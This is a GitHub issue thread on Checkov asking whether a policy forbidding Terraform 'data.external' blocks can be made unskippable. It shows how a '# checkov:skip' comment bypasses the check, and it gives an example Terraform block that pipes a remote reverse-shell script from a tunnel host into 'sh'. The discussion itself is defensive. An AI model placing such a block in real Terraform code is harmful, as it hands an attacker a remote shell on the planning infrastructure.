### ISSUE TITLE
Make a check unskipapble/mandatory?

### ISSUE THREAD

**Issue by UgniusV** [bridgecrewio/checkov#7307]
**Describe the issue**
When using Checkov to scan Terraform code for RCE, some checks need to be made unskipapble/mandatory.

**Examples**
Lets take this policy as an example:
```
---
metadata:
  name: "Forbid all data.external blocks"
  id: "FORBID_EXTERNAL_DATA_SOURCES"
  category: "SECURITY"
definition:
  cond_type: "resource"
  resource_types:
   - "data.external"
  operator: "not_exists"
```

This should prevent any malicious PR and subsequent planning if `data "external"` blocks are detected. However, insider can simply comment the check out and spawn a reverse shell:
```
# checkov:skip FORBID_EXTERNAL_DATA_SOURCES
data "external" "example" {
  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```

**Version (please complete the following information):**
 - Checkov Version [e.g. 22]

**Additional context**
Is there any way to make the check mandatory, so that it ignores `# checkov:skip` comments?

**Comment by maxamel** [comment]
Hi, unfortunately skips are applied to all checks.
